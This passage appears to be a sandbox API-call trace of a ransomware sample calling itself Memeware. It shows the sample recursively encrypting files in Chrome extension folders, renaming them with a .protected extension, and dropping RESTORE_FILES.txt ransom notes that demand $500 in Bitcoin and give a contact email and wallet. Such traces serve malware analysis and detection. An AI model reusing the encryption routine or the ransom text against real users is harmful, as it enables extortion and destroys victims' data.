Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0078.836] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json") returned 155 [0078.836] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.836] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xed, lpOverlapped=0x0) returned 1 [0078.836] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.836] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xed, lpOverlapped=0x0) returned 1 [0078.837] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.837] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.837] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.837] CloseHandle (hObject=0x168) returned 1 [0078.837] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.protected") returned 165 [0078.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json.protected")) returned 1 [0078.837] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.837] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.837] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\RESTORE_FILES.txt") returned 159 [0078.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.838] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.838] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.838] lstrlenA (lpString="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") returned 684 [0078.838] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.839] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.839] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.839] CloseHandle (hObject=0x164) returned 1 [0078.839] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.839] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0078.839] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0078.839] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0078.839] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0078.839] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0078.839] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned 144 [0078.839] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0078.839] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0078.839] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*") returned 146 [0078.839] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0078.839] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.839] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.839] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.839] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.839] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.839] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\.") returned 146 [0078.839] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.839] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.839] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.839] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.839] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.839] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.839] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.839] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\..") returned 147 [0078.839] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.840] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.840] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.840] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.840] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.840] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0078.840] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.840] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.840] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0078.840] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.840] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.840] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.840] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0078.840] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0078.840] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0078.840] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.840] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.841] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd7, lpOverlapped=0x0) returned 1 [0078.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.841] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.841] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.841] CloseHandle (hObject=0x168) returned 1 [0078.841] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.protected") returned 168 [0078.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0078.842] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.842] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.842] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 162 [0078.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0078.842] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.842] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.843] lstrlenA (lpString="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") returned 684 [0078.843] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0078.843] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.843] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.843] CloseHandle (hObject=0x164) returned 1 [0078.843] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.843] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0078.843] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0078.843] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0078.843] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0078.843] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0078.843] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned 144 [0078.843] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0078.843] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0078.843] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*") returned 146 [0078.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0078.844] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.844] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.844] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.844] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.844] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.844] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\.") returned 146 [0078.844] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.844] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.844] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.844] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.844] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.844] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.844] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.844] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\..") returned 147 [0078.844] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.844] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.844] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.844] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.844] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.844] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.844] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.844] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.844] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0078.844] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.844] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.844] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.844] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.844] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0078.844] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.845] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0078.845] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.845] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0078.845] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.845] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0078.846] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.846] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd1, lpOverlapped=0x0) returned 1 [0078.846] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.846] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.846] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.846] CloseHandle (hObject=0x168) returned 1 [0078.846] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
